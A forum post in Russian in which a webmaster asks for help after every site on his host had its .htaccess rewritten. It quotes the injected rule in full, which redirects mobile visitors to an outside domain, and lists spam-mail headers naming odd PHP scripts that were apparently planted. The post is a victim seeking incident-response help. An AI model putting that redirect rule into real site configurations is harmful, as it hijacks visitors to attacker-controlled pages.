Взломали сайт, нужна помощь

Всем день добрый!

У меня на хосте расположено 10 сайтов, 4 из них работают, 3 стоят в закрытом состоянии (ждут своего часа) и еще 3 тестовых с разными cms, которые так же находятся в закрытом состоянии.

Не так давно заметил, что в файле .htaccess абсолютно каждого сайта впихнули левый редирект на какой то даже не работающий мобильный сайт и поменяли права на незапись 444. Заметив это я вычестил все файлы и поменял пасс от админки хоста. Однако, в скором времени все файлы .htaccess вновь наполнились тем же самым редиректом.

Собственно вот этот самый код, который впихнкли во все .htaccess:

RewriteEngine on

RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]

RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]

RewriteCond %{HTTP_USER_AGENT} !america [NC]

RewriteCond %{HTTP_USER_AGENT} !avant [NC]

RewriteCond %{HTTP_USER_AGENT} !download [NC]

RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

RewriteRule ^(.*)$ http://mobile-content.info/direct.php [L,R=302]

А сегодня от хостера пришло такое письмо про спам:

3 из этих сайтов даже никогда не открывались и не проиндексированы.

Из сторонних модулей использую только два и то лишь на некоторых сайтах: "модуль переходы с ПС" и "модуль кто онлайн".

Движок на всех рабочих сайтах ДЛЕ

Собственно главный вопрос темы: Где искать дыру? виноваты дырявые модули? снести их? или же может каким то образом был украден пороль?

Если рассуждать логически то права на файл .htaccess можно было поменять только зная пороль от фтп или админки-хоста, я прав? или нет.

И если даже взломали как либо через сторонний модуль, то как тогда впихнули редирект во все другие сайты? которые даже никогда в жизни не открывались.

И каким образом впихнули это? через админку? фтп? или как еще

075 X-PHP-Script: сайт.ru/engine/newsFeb.php for 93.64.61.243, 93.64.61.243

085 X-PHP-Script: сайт.ru/engine/getinfo470n.php for 110.162.109.59, 110.162.109.59

081 X-PHP-Script: сайт.ru/engine/getinfopTdL.php for 84.122.226.216, 84.122.226.216

084 X-PHP-Script: сайт.com/b071282e47/index2ruB.php for 95.60.114.158, 95.60.114.158

Что бы не тыкать пальцем в небо, прошу помощи, где собака зарыта? какие пороли поменять? или что еще..

Спасибо.